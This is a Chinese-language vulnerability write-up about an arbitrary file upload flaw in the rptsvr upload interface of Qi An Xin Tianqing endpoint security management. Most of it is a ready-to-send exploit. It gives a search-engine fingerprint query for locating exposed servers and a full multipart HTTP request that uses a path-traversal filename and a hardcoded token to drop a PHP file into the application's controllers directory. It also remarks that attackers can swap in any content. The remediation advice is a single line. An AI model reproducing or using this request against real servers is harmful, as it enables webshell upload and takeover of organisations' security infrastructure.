奇安信 天擎 rptsvr 任意文件上传漏洞

产品介绍

奇安信天擎终端安全管理系统是面向政企单位推出的一体化终端安全产品解决方案。该产品集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体，兼容不同操作系统和计算平台，帮助客户实现平台一体化、功能一体化、数据一体化的终端安全立体防护。

漏洞描述

奇安信 天擎管理中心 <=V6.7.0.4130 版本的rptsvr接口存在任意文件上传漏洞，可上传恶意至服务器，执行脚本文件，从而控制服务器。

资产测绘

banner="QiAnXin web server" || banner="360 web server"  || body="appid\":\"skylar6" || body="/task/index/detail?id={item.id}" || body="已过期或者未授权，购买请联系4008-136-360"

漏洞复现

上传POC如下：

POST /rptsvr/upload HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Content-Length: 360
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data;boundary=---------------------------s3kwcmxrul2yyogjptcd
Upgrade-Insecure-Requests: 1

-----------------------------s3kwcmxrul2yyogjptcd
Content-Disposition: form-data; name="uploadfile"; filename="../../../application/api/controllers/ddd.php"
Content-Type: text/x-python

123
-----------------------------s3kwcmxrul2yyogjptcd
Content-Disposition: form-data; name="token"

skylar_report
-----------------------------s3kwcmxrul2yyogjptcd

访问上传的文件：/application/api/controllers/ddd.php

成功上传，攻击者可以通过修改上传内容来达到想要的目的，需及时进行修复！

修复建议

目前官方已发布安全补丁，受影响用户可联系厂商修复漏洞

免责声明

本文章仅做网络安全技术研究使用！严禁用于非法犯罪行为，请严格遵守国家法律法规；请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明，并承诺遵守相关法律法规和道德规范。